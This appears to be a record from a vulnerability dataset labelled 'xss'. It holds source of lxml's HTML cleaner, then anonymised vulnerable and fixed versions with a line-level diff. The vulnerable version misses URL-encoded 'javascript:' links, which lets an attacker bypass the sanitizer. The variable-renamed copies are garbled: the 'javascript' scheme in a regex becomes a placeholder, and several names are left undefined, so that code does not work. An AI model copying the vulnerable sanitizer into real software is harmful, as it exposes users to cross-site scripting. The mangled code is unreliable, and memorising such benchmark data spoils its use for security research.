return False
attr = self._tag_link_attrs[el.tag]
if isinstance(attr, (list, tuple)):
for one_attr in attr:
url = el.get(one_attr)
if not url:
return False
if not self.allow_embedded_url(el, url):
return False
return True
else:
url = el.get(attr)
if not url:
return False
return self.allow_embedded_url(el, url)
def allow_embedded_url(self, el, url):
if (self.whitelist_tags is not None
and el.tag not in self.whitelist_tags):
return False
scheme, netloc, path, query, fragment = urlsplit(url)
netloc = netloc.lower().split(':', 1)[0]
if scheme not in ('http', 'https'):
return False
if netloc in self.host_whitelist:
return True
return False
def kill_conditional_comments(self, doc):
"""
IE conditional comments basically embed HTML that the parser
doesn't normally see. We can't allow anything like that, so
we'll kill any comments that could be conditional.
"""
bad = []
self._kill_elements(
doc, lambda el: _conditional_comment_re.search(el.text),
etree.Comment)
def _kill_elements(self, doc, condition, iterate=None):
bad = []
for el in doc.iter(iterate):
if condition(el):
bad.append(el)
for el in bad:
el.drop_tree()
def _remove_javascript_link(self, link):
# links like "j a v a s c r i p t:" might be interpreted in IE
new = _substitute_whitespace('', unquote_plus(link))
if _is_javascript_scheme(new):
# FIXME: should this be None to delete?
return ''
return link
_substitute_comments = re.compile(r'/\*.*?\*/', re.S).sub
def _has_sneaky_javascript(self, style):
"""
Depending on the browser, stuff like ``e x p r e s s i o n(...)``
can get interpreted, or ``expre/* stuff */ssion(...)``. This
checks for attempt to do stuff like this.
Typically the response will be to kill the entire style; if you
have just a bit of Javascript in the style another rule will catch
that and remove only the Javascript from the style; this catches
more sneaky attempts.
"""
style = self._substitute_comments('', style)
style = style.replace('\\', '')
style = _substitute_whitespace('', style)
style = style.lower()
if 'javascript:' in style:
return True
if 'expression(' in style:
return True
return False
def clean_html(self, html):
result_type = type(html)
if isinstance(html, basestring):
doc = fromstring(html)
else:
doc = copy.deepcopy(html)
self(doc)
return _transform_result(result_type, doc)
clean = Cleaner()
clean_html = clean.clean_html
############################################################
## Autolinking
############################################################
_link_regexes = [
re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
# This is conservative, but autolinking can be a bit conservative:
re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_.-]+[a-z]))', re.I),
]
_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a']
_avoid_hosts = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
_avoid_classes = ['nolink']
def autolink(el, link_regexes=_link_regexes,
avoid_elements=_avoid_elements,
avoid_hosts=_avoid_hosts,
avoid_classes=_avoid_classes):
"""
Turn any URLs into links.
It will search for links identified by the given regular
expressions (by default mailto and http(s) links).
It won't link text in an element in avoid_elements, or an element
with a class in avoid_classes. It won't link to anything with a
host that matches one of the regular expressions in avoid_hosts
(default localhost and 127.0.0.1).
If you pass in an element, the element's tail will not be
substituted, only the contents of the element.
"""
if el.tag in avoid_elements:
return
class_name = el.get('class')
if class_name:
class_name = class_name.split()
for match_class in avoid_classes:
if match_class in class_name:
return
for child in list(el):
autolink(child, link_regexes=link_regexes,
avoid_elements=avoid_elements,
avoid_hosts=avoid_hosts,
avoid_classes=avoid_classes)
if child.tail:
text, tail_children = _link_text(
child.tail, link_regexes, avoid_hosts, factory=el.makeelement)
if tail_children:
child.tail = text
index = el.index(child)
el[index+1:index+1] = tail_children
if el.text:
text, pre_children = _link_text(
el.text, link_regexes, avoid_hosts, factory=el.makeelement)
if pre_children:
el.text = text
el[:0] = pre_children
def _link_text(text, link_regexes, avoid_hosts, factory):
leading_text = ''
links = []
last_pos = 0
while 1:
best_match, best_pos = None, None
for regex in link_regexes:
regex_pos = last_pos
while 1:
match = regex.search(text, pos=regex_pos)
if match is None:
break
host = match.group('host')
for host_regex in avoid_hosts:
if host_regex.search(host):
regex_pos = match.end()
break
else:
break
if match is None:
continue
if best_pos is None or match.start() < best_pos:
best_match = match
best_pos = match.start()
if best_match is None:
# No more matches
if links:
assert not links[-1].tail
links[-1].tail = text
else:
assert not leading_text
leading_text = text
break
link = best_match.group(0)
end = best_match.end()
if link.endswith('.') or link.endswith(','):
# These punctuation marks shouldn't end a link
end -= 1
link = link[:-1]
prev_text = text[:best_match.start()]
if links:
assert not links[-1].tail
links[-1].tail = prev_text
else:
assert not leading_text
leading_text = prev_text
anchor = factory('a')
anchor.set('href', link)
body = best_match.group('body')
if not body:
body = link
if body.endswith('.') or body.endswith(','):
body = body[:-1]
anchor.text = body
links.append(anchor)
text = text[end:]
return leading_text, links
def autolink_html(html, *args, **kw):
result_type = type(html)
if isinstance(html, basestring):
doc = fromstring(html)
else:
doc = copy.deepcopy(html)
autolink(doc, *args, **kw)
return _transform_result(result_type, doc)
autolink_html.__doc__ = autolink.__doc__
############################################################
## Word wrapping
############################################################
_avoid_word_break_elements = ['pre', 'textarea', 'code']
_avoid_word_break_classes = ['nobreak']
def word_break(el, max_width=40,
avoid_elements=_avoid_word_break_elements,
avoid_classes=_avoid_word_break_classes,
break_character=unichr(0x200b)):
"""
Breaks any long words found in the body of the text (not attributes).
Doesn't effect any of the tags in avoid_elements, by default
``<textarea>`` and ``<pre>``
Breaks words by inserting ​, which is a unicode character
for Zero Width Space character. This generally takes up no space
in rendering, but does copy as a space, and in monospace contexts
usually takes up space.
See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion
"""
# Character suggestion of ​ comes from:
# http://www.cs.tut.fi/~jkorpela/html/nobr.html
if el.tag in _avoid_word_break_elements:
return
class_name = el.get('class')
if class_name:
dont_break = False
class_name = class_name.split()
for avoid in avoid_classes:
if avoid in class_name:
dont_break = True
break
if dont_break:
return
if el.text:
el.text = _break_text(el.text, max_width, break_character)
for child in el:
word_break(child, max_width=max_width,
avoid_elements=avoid_elements,
avoid_classes=avoid_classes,
break_character=break_character)
if child.tail:
child.tail = _break_text(child.tail, max_width, break_character)
def word_break_html(html, *args, **kw):
result_type = type(html)
doc = fromstring(html)
word_break(doc, *args, **kw)
return _transform_result(result_type, doc)
def _break_text(text, max_width, break_character):
words = text.split()
for word in words:
if len(word) > max_width:
replacement = _insert_break(word, max_width, break_character)
text = text.replace(word, replacement)
return text
_break_prefer_re = re.compile(r'[^a-z]', re.I)
def _insert_break(word, width, break_character):
orig_word = word
result = ''
while len(word) > width:
start = word[:width]
breaks = list(_break_prefer_re.finditer(start))
if breaks:
last_break = breaks[-1]
# Only walk back up to 10 characters to find a nice break:
if last_break.end() > width-10:
# FIXME: should the break character be at the end of the
# chunk, or the beginning of the next chunk?
start = word[:last_break.end()]
result += start + break_character
word = word[len(start):]
result += word
return result
| xss | {
"code": [
" from urllib.parse import urlsplit",
" new = _substitute_whitespace('', link)"
],
"line_no": [
13,
485
]
} | {
"code": [
" from urllib import unquote_plus",
" from urllib.parse import urlsplit, unquote_plus",
" new = _substitute_whitespace('', unquote_plus(link))"
],
"line_no": [
11,
14,
486
]
} |
import re
import copy
try:
from urlparse import .urlsplit
except ImportError:
from urllib.parse import .urlsplit
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
VAR_69
except NameError:
VAR_69 = chr
try:
VAR_70
except NameError:
VAR_70 = str
try:
VAR_71
except NameError:
VAR_71 = str
try:
VAR_72
except NameError:
VAR_72 = (str, VAR_71)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
VAR_0 = re.compile(
r'expression\VAR_4*\(.*?\)', re.S|re.I)
VAR_1 = re.compile(
r'@\VAR_4*import', re.I)
VAR_2 = re.compile(
r'^data:image/.+;base64', re.I).search
VAR_3 = re.compile(
r'(?:VAR_33|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def FUNC_0(VAR_4):
if VAR_2(VAR_4):
return None
return VAR_3(VAR_4)
VAR_5 = re.compile(r'[\VAR_4\x00-\x08\x0B\x0C\x0E-\x19]+').sub
VAR_6 = re.compile(
r'\[if[\VAR_4\n\r]+.*?][\VAR_4\n\r]*>', re.I|re.S)
VAR_7 = etree.XPath(
"descendant-or-self::*[@VAR_35]")
VAR_8 = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class CLASS_0(object):
VAR_32 = True
VAR_33 = True
VAR_34 = True
VAR_35 = False
VAR_36 = None
VAR_37 = True
VAR_38 = True
VAR_39 = True
VAR_40 = True
VAR_41 = True
VAR_42 = True
VAR_43 = True
VAR_44 = True
VAR_45 = None
VAR_46 = None
VAR_47 = None
VAR_48 = True
VAR_49 = True
VAR_50 = defs.safe_attrs
VAR_51 = False
VAR_52 = ()
VAR_53 = set(['iframe', 'embed'])
def __init__(self, **VAR_24):
for name, value in VAR_24.items():
if not hasattr(self, name):
raise TypeError(
"Unknown parameter: %VAR_4=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in VAR_24:
self.inline_style = self.style
VAR_54 = dict(
script='src',
VAR_60='href',
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
a='href',
)
def __call__(self, VAR_55):
if hasattr(VAR_55, 'getroot'):
VAR_55 = VAR_55.getroot()
xhtml_to_html(VAR_55)
for VAR_15 in VAR_55.iter('image'):
VAR_15.tag = 'img'
if not self.comments:
self.kill_conditional_comments(VAR_55)
VAR_47 = set(self.kill_tags or ())
VAR_45 = set(self.remove_tags or ())
VAR_46 = set(self.allow_tags or ())
if self.scripts:
VAR_47.add('script')
if self.safe_attrs_only:
VAR_50 = set(self.safe_attrs)
for VAR_15 in VAR_55.iter(etree.Element):
VAR_96 = VAR_15.attrib
for aname in VAR_96.keys():
if aname not in VAR_50:
del VAR_96[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
for VAR_15 in VAR_55.iter(etree.Element):
VAR_96 = VAR_15.attrib
for aname in VAR_96.keys():
if aname.startswith('on'):
del VAR_96[aname]
VAR_55.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
if not self.inline_style:
for VAR_15 in VAR_7(VAR_55):
VAR_102 = VAR_15.get('style')
VAR_82 = VAR_0.sub('', VAR_102)
VAR_82 = VAR_1.sub('', VAR_82)
if self._has_sneaky_javascript(VAR_82):
del VAR_15.attrib['style']
elif VAR_82 != VAR_102:
VAR_15.set('style', VAR_82)
if not self.style:
for VAR_15 in list(VAR_55.iter('style')):
if VAR_15.get('type', '').lower().strip() == 'text/javascript':
VAR_15.drop_tree()
continue
VAR_102 = VAR_15.text or ''
VAR_82 = VAR_0.sub('', VAR_102)
VAR_82 = VAR_1.sub('', VAR_102)
if self._has_sneaky_javascript(VAR_82):
VAR_15.text = '/* deleted */'
elif VAR_82 != VAR_102:
VAR_15.text = VAR_82
if self.comments or self.processing_instructions:
VAR_47.add(etree.Comment)
if self.processing_instructions:
VAR_47.add(etree.ProcessingInstruction)
if self.style:
VAR_47.add('style')
if self.inline_style:
etree.strip_attributes(VAR_55, 'style')
if self.links:
VAR_47.add('link')
elif self.style or self.javascript:
for VAR_15 in list(VAR_55.iter('link')):
if 'stylesheet' in VAR_15.get('rel', '').lower():
if not self.allow_element(VAR_15):
VAR_15.drop_tree()
if self.meta:
VAR_47.add('meta')
if self.page_structure:
VAR_45.update(('head', 'html', 'title'))
if self.embedded:
for VAR_15 in list(VAR_55.iter('param')):
VAR_97 = False
VAR_98 = VAR_15.getparent()
while VAR_98 is not None and VAR_98.tag not in ('applet', 'object'):
VAR_98 = VAR_98.getparent()
if VAR_98 is None:
VAR_15.drop_tree()
VAR_47.update(('applet',))
VAR_45.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
VAR_47.update(defs.frame_tags)
if self.forms:
VAR_45.add('form')
VAR_47.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
VAR_45.update(('blink', 'marquee'))
VAR_73 = []
VAR_74 = []
for VAR_15 in VAR_55.iter():
if VAR_15.tag in VAR_47:
if self.allow_element(VAR_15):
continue
VAR_74.append(VAR_15)
elif VAR_15.tag in VAR_45:
if self.allow_element(VAR_15):
continue
VAR_73.append(VAR_15)
if VAR_73 and VAR_73[0] == VAR_55:
VAR_15 = VAR_73.pop(0)
VAR_15.tag = 'div'
VAR_15.attrib.clear()
elif VAR_74 and VAR_74[0] == VAR_55:
VAR_15 = VAR_74.pop(0)
if VAR_15.tag != 'html':
VAR_15.tag = 'div'
VAR_15.clear()
VAR_74.reverse() # VAR_90 with innermost tags
for VAR_15 in VAR_74:
VAR_15.drop_tree()
for VAR_15 in VAR_73:
VAR_15.drop_tag()
if self.remove_unknown_tags:
if VAR_46:
raise ValueError(
"It does not make sense to pass in both VAR_46 and remove_unknown_tags")
VAR_46 = set(defs.tags)
if VAR_46:
VAR_81 = []
for VAR_15 in VAR_55.iter():
if VAR_15.tag not in VAR_46:
VAR_81.append(VAR_15)
if VAR_81:
if VAR_81[0] is VAR_55:
VAR_15 = VAR_81.pop(0)
VAR_15.tag = 'div'
VAR_15.attrib.clear()
for VAR_15 in VAR_81:
VAR_15.drop_tag()
if self.add_nofollow:
for VAR_15 in VAR_8(VAR_55):
if not self.allow_follow(VAR_15):
VAR_103 = VAR_15.get('rel')
if VAR_103:
if ('nofollow' in VAR_103
and ' nofollow ' in (' %VAR_4 ' % VAR_103)):
continue
VAR_103 = '%VAR_4 nofollow' % VAR_103
else:
VAR_103 = 'nofollow'
VAR_15.set('rel', VAR_103)
def FUNC_8(self, VAR_56):
return False
def FUNC_9(self, VAR_15):
if VAR_15.tag not in self._tag_link_attrs:
return False
VAR_75 = self._tag_link_attrs[VAR_15.tag]
if isinstance(VAR_75, (list, tuple)):
for one_attr in VAR_75:
VAR_57 = VAR_15.get(one_attr)
if not VAR_57:
return False
if not self.allow_embedded_url(VAR_15, VAR_57):
return False
return True
else:
VAR_57 = VAR_15.get(VAR_75)
if not VAR_57:
return False
return self.allow_embedded_url(VAR_15, VAR_57)
def FUNC_10(self, VAR_15, VAR_57):
if (self.whitelist_tags is not None
and VAR_15.tag not in self.whitelist_tags):
return False
VAR_76, VAR_77, VAR_78, VAR_79, VAR_80 = urlsplit(VAR_57)
VAR_77 = netloc.lower().split(':', 1)[0]
if VAR_76 not in ('http', 'https'):
return False
if VAR_77 in self.host_whitelist:
return True
return False
def FUNC_11(self, VAR_55):
VAR_81 = []
self._kill_elements(
VAR_55, lambda VAR_15: VAR_6.search(VAR_15.text),
etree.Comment)
def FUNC_12(self, VAR_55, VAR_58, VAR_59=None):
VAR_81 = []
for VAR_15 in VAR_55.iter(VAR_59):
if VAR_58(VAR_15):
VAR_81.append(VAR_15)
for VAR_15 in VAR_81:
VAR_15.drop_tree()
def FUNC_13(self, VAR_60):
VAR_82 = VAR_5('', VAR_60)
if FUNC_0(VAR_82):
return ''
return VAR_60
VAR_61 = re.compile(r'/\*.*?\*/', re.S).sub
def FUNC_14(self, VAR_35):
VAR_35 = self._substitute_comments('', VAR_35)
VAR_35 = VAR_35.replace('\\', '')
VAR_35 = VAR_5('', VAR_35)
VAR_35 = VAR_35.lower()
if 'javascript:' in VAR_35:
return True
if 'expression(' in VAR_35:
return True
return False
def VAR_10(self, VAR_22):
VAR_65 = type(VAR_22)
if isinstance(VAR_22, VAR_72):
VAR_55 = fromstring(VAR_22)
else:
VAR_55 = copy.deepcopy(VAR_22)
self(VAR_55)
return _transform_result(VAR_65, VAR_55)
VAR_9 = CLASS_0()
VAR_10 = VAR_9.clean_html
VAR_11 = [
re.compile(r'(?P<VAR_88>https?://(?P<VAR_101>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
re.compile(r'mailto:(?P<VAR_88>[a-z0-9._-]+@(?P<VAR_101>[a-z0-9_.-]+[a-z]))', re.I),
]
VAR_12 = ['textarea', 'pre', 'code', 'head', 'select', 'a']
VAR_13 = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
VAR_14 = ['nolink']
def FUNC_1(VAR_15, VAR_16=VAR_11,
VAR_17=VAR_12,
VAR_18=VAR_13,
VAR_19=VAR_14):
if VAR_15.tag in VAR_17:
return
VAR_62 = VAR_15.get('class')
if VAR_62:
VAR_62 = VAR_62.split()
for match_class in VAR_19:
if match_class in VAR_62:
return
for child in list(VAR_15):
FUNC_1(child, VAR_16=link_regexes,
VAR_17=avoid_elements,
VAR_18=avoid_hosts,
VAR_19=avoid_classes)
if child.tail:
VAR_20, VAR_92 = FUNC_2(
child.tail, VAR_16, VAR_18, VAR_21=VAR_15.makeelement)
if VAR_92:
child.tail = VAR_20
VAR_99 = VAR_15.index(child)
VAR_15[VAR_99+1:VAR_99+1] = VAR_92
if VAR_15.text:
VAR_20, VAR_83 = FUNC_2(
VAR_15.text, VAR_16, VAR_18, VAR_21=VAR_15.makeelement)
if VAR_83:
VAR_15.text = VAR_20
VAR_15[:0] = VAR_83
def FUNC_2(VAR_20, VAR_16, VAR_18, VAR_21):
VAR_63 = ''
VAR_37 = []
VAR_64 = 0
while 1:
VAR_84, VAR_85 = None, None
for regex in VAR_16:
VAR_93 = VAR_64
while 1:
VAR_100 = regex.search(VAR_20, pos=VAR_93)
if VAR_100 is None:
break
VAR_101 = VAR_100.group('host')
for host_regex in VAR_18:
if host_regex.search(VAR_101):
VAR_93 = VAR_100.end()
break
else:
break
if VAR_100 is None:
continue
if VAR_85 is None or VAR_100.start() < VAR_85:
VAR_84 = VAR_100
VAR_85 = VAR_100.start()
if VAR_84 is None:
if VAR_37:
assert not VAR_37[-1].tail
VAR_37[-1].tail = VAR_20
else:
assert not VAR_63
leading_text = VAR_20
break
VAR_60 = VAR_84.group(0)
VAR_86 = VAR_84.end()
if VAR_60.endswith('.') or VAR_60.endswith(','):
VAR_86 -= 1
VAR_60 = link[:-1]
VAR_87 = VAR_20[:VAR_84.start()]
if VAR_37:
assert not VAR_37[-1].tail
VAR_37[-1].tail = VAR_87
else:
assert not VAR_63
leading_text = VAR_87
VAR_56 = VAR_21('a')
VAR_56.set('href', VAR_60)
VAR_88 = VAR_84.group('body')
if not VAR_88:
VAR_88 = VAR_60
if VAR_88.endswith('.') or VAR_88.endswith(','):
VAR_88 = body[:-1]
VAR_56.text = VAR_88
VAR_37.append(VAR_56)
VAR_20 = text[VAR_86:]
return VAR_63, VAR_37
def FUNC_3(VAR_22, *VAR_23, **VAR_24):
VAR_65 = type(VAR_22)
if isinstance(VAR_22, VAR_72):
VAR_55 = fromstring(VAR_22)
else:
VAR_55 = copy.deepcopy(VAR_22)
FUNC_1(VAR_55, *VAR_23, **VAR_24)
return _transform_result(VAR_65, VAR_55)
FUNC_3.__doc__ = FUNC_1.__doc__
VAR_25 = ['pre', 'textarea', 'code']
VAR_26 = ['nobreak']
def FUNC_4(VAR_15, VAR_27=40,
VAR_17=VAR_25,
VAR_19=VAR_26,
VAR_28=VAR_69(0x200b)):
if VAR_15.tag in VAR_25:
return
VAR_62 = VAR_15.get('class')
if VAR_62:
VAR_89 = False
VAR_62 = VAR_62.split()
for avoid in VAR_19:
if avoid in VAR_62:
VAR_89 = True
break
if VAR_89:
return
if VAR_15.text:
VAR_15.text = FUNC_6(VAR_15.text, VAR_27, VAR_28)
for child in VAR_15:
FUNC_4(child, VAR_27=max_width,
VAR_17=avoid_elements,
VAR_19=avoid_classes,
VAR_28=break_character)
if child.tail:
child.tail = FUNC_6(child.tail, VAR_27, VAR_28)
def FUNC_5(VAR_22, *VAR_23, **VAR_24):
VAR_65 = type(VAR_22)
VAR_55 = fromstring(VAR_22)
FUNC_4(VAR_55, *VAR_23, **VAR_24)
return _transform_result(VAR_65, VAR_55)
def FUNC_6(VAR_20, VAR_27, VAR_28):
VAR_66 = VAR_20.split()
for VAR_30 in VAR_66:
if len(VAR_30) > VAR_27:
VAR_94 = FUNC_7(VAR_30, VAR_27, VAR_28)
VAR_20 = VAR_20.replace(VAR_30, VAR_94)
return VAR_20
VAR_29 = re.compile(r'[^a-z]', re.I)
def FUNC_7(VAR_30, VAR_31, VAR_28):
VAR_67 = VAR_30
VAR_68 = ''
while len(VAR_30) > VAR_31:
VAR_90 = VAR_30[:VAR_31]
VAR_91 = list(VAR_29.finditer(VAR_90))
if VAR_91:
VAR_95 = VAR_91[-1]
if VAR_95.end() > VAR_31-10:
VAR_90 = VAR_30[:VAR_95.end()]
VAR_68 += VAR_90 + VAR_28
VAR_30 = word[len(VAR_90):]
VAR_68 += VAR_30
return VAR_68
|
import re
import copy
try:
from urlparse import .urlsplit
from urllib import unquote_plus
except ImportError:
from urllib.parse import .urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
VAR_69
except NameError:
VAR_69 = chr
try:
VAR_70
except NameError:
VAR_70 = str
try:
VAR_71
except NameError:
VAR_71 = str
try:
VAR_72
except NameError:
VAR_72 = (str, VAR_71)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
VAR_0 = re.compile(
r'expression\VAR_4*\(.*?\)', re.S|re.I)
VAR_1 = re.compile(
r'@\VAR_4*import', re.I)
VAR_2 = re.compile(
r'^data:image/.+;base64', re.I).search
VAR_3 = re.compile(
r'(?:VAR_33|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def FUNC_0(VAR_4):
if VAR_2(VAR_4):
return None
return VAR_3(VAR_4)
VAR_5 = re.compile(r'[\VAR_4\x00-\x08\x0B\x0C\x0E-\x19]+').sub
VAR_6 = re.compile(
r'\[if[\VAR_4\n\r]+.*?][\VAR_4\n\r]*>', re.I|re.S)
VAR_7 = etree.XPath(
"descendant-or-self::*[@VAR_35]")
VAR_8 = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class CLASS_0(object):
VAR_32 = True
VAR_33 = True
VAR_34 = True
VAR_35 = False
VAR_36 = None
VAR_37 = True
VAR_38 = True
VAR_39 = True
VAR_40 = True
VAR_41 = True
VAR_42 = True
VAR_43 = True
VAR_44 = True
VAR_45 = None
VAR_46 = None
VAR_47 = None
VAR_48 = True
VAR_49 = True
VAR_50 = defs.safe_attrs
VAR_51 = False
VAR_52 = ()
VAR_53 = set(['iframe', 'embed'])
def __init__(self, **VAR_24):
for name, value in VAR_24.items():
if not hasattr(self, name):
raise TypeError(
"Unknown parameter: %VAR_4=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in VAR_24:
self.inline_style = self.style
VAR_54 = dict(
script='src',
VAR_60='href',
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
a='href',
)
def __call__(self, VAR_55):
if hasattr(VAR_55, 'getroot'):
VAR_55 = VAR_55.getroot()
xhtml_to_html(VAR_55)
for VAR_15 in VAR_55.iter('image'):
VAR_15.tag = 'img'
if not self.comments:
self.kill_conditional_comments(VAR_55)
VAR_47 = set(self.kill_tags or ())
VAR_45 = set(self.remove_tags or ())
VAR_46 = set(self.allow_tags or ())
if self.scripts:
VAR_47.add('script')
if self.safe_attrs_only:
VAR_50 = set(self.safe_attrs)
for VAR_15 in VAR_55.iter(etree.Element):
VAR_96 = VAR_15.attrib
for aname in VAR_96.keys():
if aname not in VAR_50:
del VAR_96[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
for VAR_15 in VAR_55.iter(etree.Element):
VAR_96 = VAR_15.attrib
for aname in VAR_96.keys():
if aname.startswith('on'):
del VAR_96[aname]
VAR_55.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
if not self.inline_style:
for VAR_15 in VAR_7(VAR_55):
VAR_102 = VAR_15.get('style')
VAR_82 = VAR_0.sub('', VAR_102)
VAR_82 = VAR_1.sub('', VAR_82)
if self._has_sneaky_javascript(VAR_82):
del VAR_15.attrib['style']
elif VAR_82 != VAR_102:
VAR_15.set('style', VAR_82)
if not self.style:
for VAR_15 in list(VAR_55.iter('style')):
if VAR_15.get('type', '').lower().strip() == 'text/javascript':
VAR_15.drop_tree()
continue
VAR_102 = VAR_15.text or ''
VAR_82 = VAR_0.sub('', VAR_102)
VAR_82 = VAR_1.sub('', VAR_102)
if self._has_sneaky_javascript(VAR_82):
VAR_15.text = '/* deleted */'
elif VAR_82 != VAR_102:
VAR_15.text = VAR_82
if self.comments or self.processing_instructions:
VAR_47.add(etree.Comment)
if self.processing_instructions:
VAR_47.add(etree.ProcessingInstruction)
if self.style:
VAR_47.add('style')
if self.inline_style:
etree.strip_attributes(VAR_55, 'style')
if self.links:
VAR_47.add('link')
elif self.style or self.javascript:
for VAR_15 in list(VAR_55.iter('link')):
if 'stylesheet' in VAR_15.get('rel', '').lower():
if not self.allow_element(VAR_15):
VAR_15.drop_tree()
if self.meta:
VAR_47.add('meta')
if self.page_structure:
VAR_45.update(('head', 'html', 'title'))
if self.embedded:
for VAR_15 in list(VAR_55.iter('param')):
VAR_97 = False
VAR_98 = VAR_15.getparent()
while VAR_98 is not None and VAR_98.tag not in ('applet', 'object'):
VAR_98 = VAR_98.getparent()
if VAR_98 is None:
VAR_15.drop_tree()
VAR_47.update(('applet',))
VAR_45.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
VAR_47.update(defs.frame_tags)
if self.forms:
VAR_45.add('form')
VAR_47.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
VAR_45.update(('blink', 'marquee'))
VAR_73 = []
VAR_74 = []
for VAR_15 in VAR_55.iter():
if VAR_15.tag in VAR_47:
if self.allow_element(VAR_15):
continue
VAR_74.append(VAR_15)
elif VAR_15.tag in VAR_45:
if self.allow_element(VAR_15):
continue
VAR_73.append(VAR_15)
if VAR_73 and VAR_73[0] == VAR_55:
VAR_15 = VAR_73.pop(0)
VAR_15.tag = 'div'
VAR_15.attrib.clear()
elif VAR_74 and VAR_74[0] == VAR_55:
VAR_15 = VAR_74.pop(0)
if VAR_15.tag != 'html':
VAR_15.tag = 'div'
VAR_15.clear()
VAR_74.reverse() # VAR_90 with innermost tags
for VAR_15 in VAR_74:
VAR_15.drop_tree()
for VAR_15 in VAR_73:
VAR_15.drop_tag()
if self.remove_unknown_tags:
if VAR_46:
raise ValueError(
"It does not make sense to pass in both VAR_46 and remove_unknown_tags")
VAR_46 = set(defs.tags)
if VAR_46:
VAR_81 = []
for VAR_15 in VAR_55.iter():
if VAR_15.tag not in VAR_46:
VAR_81.append(VAR_15)
if VAR_81:
if VAR_81[0] is VAR_55:
VAR_15 = VAR_81.pop(0)
VAR_15.tag = 'div'
VAR_15.attrib.clear()
for VAR_15 in VAR_81:
VAR_15.drop_tag()
if self.add_nofollow:
for VAR_15 in VAR_8(VAR_55):
if not self.allow_follow(VAR_15):
VAR_103 = VAR_15.get('rel')
if VAR_103:
if ('nofollow' in VAR_103
and ' nofollow ' in (' %VAR_4 ' % VAR_103)):
continue
VAR_103 = '%VAR_4 nofollow' % VAR_103
else:
VAR_103 = 'nofollow'
VAR_15.set('rel', VAR_103)
def FUNC_8(self, VAR_56):
return False
def FUNC_9(self, VAR_15):
if VAR_15.tag not in self._tag_link_attrs:
return False
VAR_75 = self._tag_link_attrs[VAR_15.tag]
if isinstance(VAR_75, (list, tuple)):
for one_attr in VAR_75:
VAR_57 = VAR_15.get(one_attr)
if not VAR_57:
return False
if not self.allow_embedded_url(VAR_15, VAR_57):
return False
return True
else:
VAR_57 = VAR_15.get(VAR_75)
if not VAR_57:
return False
return self.allow_embedded_url(VAR_15, VAR_57)
def FUNC_10(self, VAR_15, VAR_57):
if (self.whitelist_tags is not None
and VAR_15.tag not in self.whitelist_tags):
return False
VAR_76, VAR_77, VAR_78, VAR_79, VAR_80 = urlsplit(VAR_57)
VAR_77 = netloc.lower().split(':', 1)[0]
if VAR_76 not in ('http', 'https'):
return False
if VAR_77 in self.host_whitelist:
return True
return False
def FUNC_11(self, VAR_55):
VAR_81 = []
self._kill_elements(
VAR_55, lambda VAR_15: VAR_6.search(VAR_15.text),
etree.Comment)
def FUNC_12(self, VAR_55, VAR_58, VAR_59=None):
VAR_81 = []
for VAR_15 in VAR_55.iter(VAR_59):
if VAR_58(VAR_15):
VAR_81.append(VAR_15)
for VAR_15 in VAR_81:
VAR_15.drop_tree()
def FUNC_13(self, VAR_60):
VAR_82 = VAR_5('', unquote_plus(VAR_60))
if FUNC_0(VAR_82):
return ''
return VAR_60
VAR_61 = re.compile(r'/\*.*?\*/', re.S).sub
def FUNC_14(self, VAR_35):
VAR_35 = self._substitute_comments('', VAR_35)
VAR_35 = VAR_35.replace('\\', '')
VAR_35 = VAR_5('', VAR_35)
VAR_35 = VAR_35.lower()
if 'javascript:' in VAR_35:
return True
if 'expression(' in VAR_35:
return True
return False
def VAR_10(self, VAR_22):
VAR_65 = type(VAR_22)
if isinstance(VAR_22, VAR_72):
VAR_55 = fromstring(VAR_22)
else:
VAR_55 = copy.deepcopy(VAR_22)
self(VAR_55)
return _transform_result(VAR_65, VAR_55)
VAR_9 = CLASS_0()
VAR_10 = VAR_9.clean_html
VAR_11 = [
